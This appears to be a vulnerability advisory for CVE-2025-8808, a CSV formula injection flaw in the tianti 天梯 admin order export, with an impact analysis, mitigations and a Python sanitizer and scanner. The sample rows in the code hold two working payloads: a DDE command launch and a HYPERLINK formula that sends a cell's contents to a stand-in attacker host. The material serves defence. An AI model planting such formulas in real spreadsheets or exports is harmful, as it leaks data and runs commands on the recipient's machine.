
CVE-2025-8808: CSV Injection in xujeff tianti 天梯

Medium
Tags: Vulnerability, CVE-2025-8808
Published: Sun Aug 10 2025 (08/10/2025, 12:02:06 UTC)
Source: CVE Database V5
Vendor/Project: xujeff
Product: tianti 天梯

Description

A vulnerability was found in xujeff tianti 天梯 up to 2.3. It has been rated as problematic. This issue affects the function exportOrder of the file /tianti-module-admin/user/ajax/save of the component com.jeff.tianti.controller. The manipulation leads to csv injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

AI-Powered Analysis

Last updated: 08/18/2025, 01:05:20 UTC

Technical Analysis

CVE-2025-8808 is a CSV injection (formula injection) vulnerability in xujeff tianti 天梯, affecting versions up to 2.3. According to the VulDB record it lies in the exportOrder function reached through /tianti-module-admin/user/ajax/save in the com.jeff.tianti.controller component. CSV injection occurs when untrusted input is written into a CSV export without neutralization: a field that begins with '=', '+', '-' or '@' (optionally preceded by spaces, a tab or a carriage return) is evaluated as a formula when the file is opened in spreadsheet software such as Microsoft Excel, LibreOffice Calc or Google Sheets. Depending on the client and its settings, an injected formula can leak cell contents through functions such as HYPERLINK or external data references, or launch a local program through DDE on clients that still honour it; current clients usually warn before fetching remote content or starting DDE, but users frequently click through. The CVSS 4.0 vector (AV:N/AC:L/PR:L/UI:N) gives a base score of 5.3, medium severity. Read the vector carefully: the issue is network-reachable and low-complexity, but PR:L means the attacker needs low-privileged access, i.e. an account able to submit the data that later lands in the export; it is not unauthenticated. UI:N reflects that planting the payload needs no action from a victim; the payload only fires when an administrator later exports the order data and opens the file in a spreadsheet, so a realistic attack depends on that step. The vendor was contacted and did not respond, and no fix is available. The record states that the exploit has been publicly disclosed, which lowers the bar for attempts, although exploitation in the wild has not been reported. The impact falls on the confidentiality and integrity of whatever the export recipient has open: formulas can exfiltrate data or alter what the spreadsheet shows. The threat matters most where exported CSV files are shared or processed by several people, typically in administrative or financial contexts.

Potential Impact

For European organizations using xujeff tianti 天梯, this vulnerability poses a moderate risk. Malicious formulas injected into CSV exports can lead to unauthorized data access or manipulation when the files are opened in spreadsheet applications. This can compromise sensitive business data, financial records or user information, and may put the organization in breach of GDPR data protection obligations. Because the payload is stored with the order data and fires on whoever opens the export, bulk or scheduled exports that are circulated to several staff widen the blast radius; the attacker only needs a low-privileged account that can submit order data. Organizations relying on tianti 天梯 for order management or administrative functions may face operational disruption or reputational damage if the flaw is exploited. The lack of a vendor response or patch means organizations must mitigate the risk themselves. The medium score reflects a moderate impact on confidentiality and integrity with little effect on availability; used as one step in a broader attack chain, for example to pivot from an exported spreadsheet to an administrator's workstation, the consequences could escalate.

Mitigation Recommendations

1. Neutralize every user-supplied value written to a CSV export. A cell is dangerous if, after stripping leading whitespace (space, tab, carriage return), it starts with '=', '+', '-' or '@'. Prefix such cells with a single quote (or a tab) so the spreadsheet stores them as text, quote every field and double any embedded double quotes so a value cannot break out of its cell, and exempt fields that are plain numbers so that negative amounts such as -12.50 are not turned into text.
2. Restrict the exportOrder function and the /tianti-module-admin/user/ajax/save path to authorized administrators, and log and review who exports what.
3. Tell recipients of exports not to treat CSV files from the application as inert data: keep Protected View enabled, disable DDE in the Excel Trust Center (External Content) where the business does not need it, and decline prompts to update external links or run remote content.
4. Limit network exposure of the admin module, for example by IP allow-listing or VPN-only access, since the attacker needs an account that can reach it.
5. Watch for unusual export activity and for stored values beginning with formula triggers in the fields that end up in exports; scanning a generated CSV for such cells before it is shared is a cheap check.
6. A WAF or RASP rule that flags inputs starting with formula triggers can catch crude payloads, but because the payload is stored data that only fires in the client, treat this as defence in depth rather than the fix.
7. If feasible, patch the export code yourself, or move to an export format with explicit cell types (for example XLSX with string cells) rather than CSV.
8. Maintain an incident response plan so that any detected exploitation or data compromise related to this vulnerability can be handled quickly.
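The following Python is an added example, not code from tianti or from VulDB, that ties together the injection mechanism described in the technical analysis and the neutralization and scanning steps in points 1 and 5 above. The function names, the order-export layout and the sample rows (including the two payloads, a DDE launch and a HYPERLINK that leaks cell A1) are constructed for illustration.

```python
"""CSV formula injection: unsafe export, neutralized export, and a scanner.

Added example (not tianti code). Field names and sample rows are constructed.
"""
import csv
import io
import re

# Leading characters that make Excel, LibreOffice Calc and Google Sheets
# evaluate a cell as a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@")

# Plain numbers (optional sign, optional fraction) cannot carry a formula,
# so they are left alone; otherwise "-12.50" would be turned into text.
_PLAIN_NUMBER = re.compile(r"^[+-]?\d+(\.\d+)?$")


def is_formula_cell(value: str) -> bool:
    """True if a spreadsheet would try to evaluate this cell as a formula.

    Leading whitespace (space, tab, carriage return) is stripped first because
    the client ignores it, so ' =1+1' and '\t=1+1' are still formulas.
    """
    stripped = value.lstrip()
    if not stripped or _PLAIN_NUMBER.match(stripped):
        return False
    return stripped[0] in FORMULA_TRIGGERS


def neutralize_cell(value) -> str:
    """Disarm a cell by prefixing a single quote so the client stores it as text."""
    text = "" if value is None else str(value)
    return "'" + text if is_formula_cell(text) else text


def export_csv(rows, sanitize: bool = True) -> str:
    """Serialize rows to CSV text. sanitize=False reproduces the unsafe export.

    QUOTE_ALL wraps every field in double quotes and doubles embedded quotes,
    so commas, tabs, quotes and newlines inside a value cannot break out of
    the cell; neutralize_cell() handles the formula triggers.
    """
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        cells = [c if c is not None else "" for c in row]
        writer.writerow([neutralize_cell(c) if sanitize else str(c) for c in cells])
    return buf.getvalue()


def find_formula_cells(csv_text: str):
    """Scan an exported CSV and return (row, column, value) for every cell a
    spreadsheet would evaluate. Use it to check an export before sharing it."""
    hits = []
    for r, row in enumerate(csv.reader(io.StringIO(csv_text))):
        for c, cell in enumerate(row):
            if is_formula_cell(cell):
                hits.append((r, c, cell))
    return hits


# Constructed sample: an order export whose customer field is attacker-controlled.
# Row 1002 is a DDE launch (fires only on clients with DDE enabled), row 1003
# a HYPERLINK that would leak the contents of A1 to an attacker host on click,
# row 1004 shows that leading whitespace does not protect the cell.
SAMPLE_ORDERS = [
    ["order_id", "customer", "amount"],
    ["1001", "Alice", "-12.50"],
    ["1002", "=cmd|' /C calc'!A0", "40.00"],
    ["1003", '=HYPERLINK("http://attacker.invalid/?"&A1,"View order")', "15.00"],
    ["1004", "  =1+1", "7.00"],
]

if __name__ == "__main__":
    unsafe = export_csv(SAMPLE_ORDERS, sanitize=False)
    print("UNSAFE export:\n" + unsafe)
    print("cells a spreadsheet would evaluate in the unsafe file:")
    for hit in find_formula_cells(unsafe):
        print("  ", hit)
    print("\nSAFE export:\n" + export_csv(SAMPLE_ORDERS))
```

The single-quote prefix is the form most spreadsheets understand, but it is visible to any downstream program that re-reads the CSV as data, so keep the neutralized export separate from machine-to-machine feeds, or move those feeds to a format with explicit cell types.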


Technical Details

Data Version
5.1
Assigner Short Name
VulDB
Date Reserved
2025-08-09T07:51:06.464Z
Cvss Version
4.0
State
PUBLISHED

Threat ID: 68988de7ad5a09ad00183e2f

Added to database: 8/10/2025, 12:17:43 PM

Last enriched: 8/18/2025, 1:05:20 AM

Last updated: 8/19/2025, 12:34:30 AM

